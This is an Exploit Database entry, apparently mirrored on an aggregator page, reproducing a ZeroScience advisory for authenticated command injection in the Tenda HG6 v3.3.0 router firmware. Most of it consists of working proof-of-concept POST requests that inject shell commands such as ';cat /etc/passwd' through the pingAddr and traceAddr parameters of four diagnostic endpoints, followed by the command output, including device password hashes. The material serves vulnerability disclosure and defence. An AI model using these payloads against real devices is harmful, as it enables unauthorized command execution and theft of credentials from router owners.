Tenda HG6 v3.3.0 – Remote Command Injection

• Exploit Database
• 18 阅读

• 作者： LiquidWorm
  日期： 2022-05-11
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50916/

• # Exploit Title: Tenda HG6 v3.3.0 - Remote Command Injection
  # Exploit Author: LiquidWorm
  
  Tenda HG6 v3.3.0 Remote Command Injection Vulnerability
  
  
  Vendor: Tenda Technology Co.,Ltd.
  Product web page: https://www.tendacn.com
  https://www.tendacn.com/product/HG6.html
  Affected version: Firmware version: 3.3.0-210926
  Software version: v1.1.0
  Hardware Version: v1.0
  Check Version: TD_HG6_XPON_TDE_ISP
  
  Summary: HG6 is an intelligent routing passive optical network
  terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),
  a voice port to meet users' requirements for enjoying the Internet,
  HD IPTV and VoIP multi-service applications.
  
  Desc: The application suffers from an authenticated OS command injection
  vulnerability. This can be exploited to inject and execute arbitrary
  shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters
  in formPing, formPing6, formTracert and formTracert6 interfaces.
  
  Tested on: Boa/0.93.15
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5706
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php
  
  
  22.04.2022
  
  --
  
  
  ping.asp:
  ---------
  
  POST /boaform/formPing HTTP/1.1
  Host: 192.168.1.1
  
  pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564
  
  ---
  TZ
  app.gwdt
  bftpd.conf
  buildtime
  check_version.txt
  config
  config.csv
  config_default.xml
  config_default_hs.xml
  dhclient-script
  dnsmasq.conf
  ethertypes
  factory_default.xml
  ftpdpassword
  group
  hardversion
  inetd.conf
  init.d
  inittab
  innversion
  insdrv.sh
  irf
  mdev.conf
  omci_custom_opt.conf
  omci_ignore_mib_tbl.conf
  omci_ignore_mib_tbl_10g.conf
  omci_mib.cfg
  orf
  passwd
  ppp
  profile
  protocols
  radvd.conf
  ramfs.img
  rc_boot_dsp
  rc_voip
  release_date
  resolv.conf
  rtk_tr142.sh
  run_customized_sdk.sh
  runoam.sh
  runomci.sh
  runsdk.sh
  samba
  scripts
  services
  setprmt_reject
  shells
  simplecfgservice.xml
  smb.conf
  softversion
  solar.conf
  solar.conf.in
  ssl_cert.pem
  ssl_key.pem
  version
  wscd.conf
  
  
  ping6.asp:
  ----------
  
  POST /boaform/formPing6 HTTP/1.1
  Host: 192.168.1.1
  
  pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp
  
  ---
  boa.conf
  web
  
  
  tracert.asp:
  ------------
  
  POST /boaform/formTracert HTTP/1.1
  Host: 192.168.1.1
  
  traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp
  
  ---
  /home/httpd
  
  
  tracert6.asp:
  -------------
  
  POST /boaform/formTracert6 HTTP/1.1
  Host: 192.168.1.1
  
  traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp
  
  ---
  admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh
  adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh
  nobody:x:0:0::/tmp:/dev/null
  user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh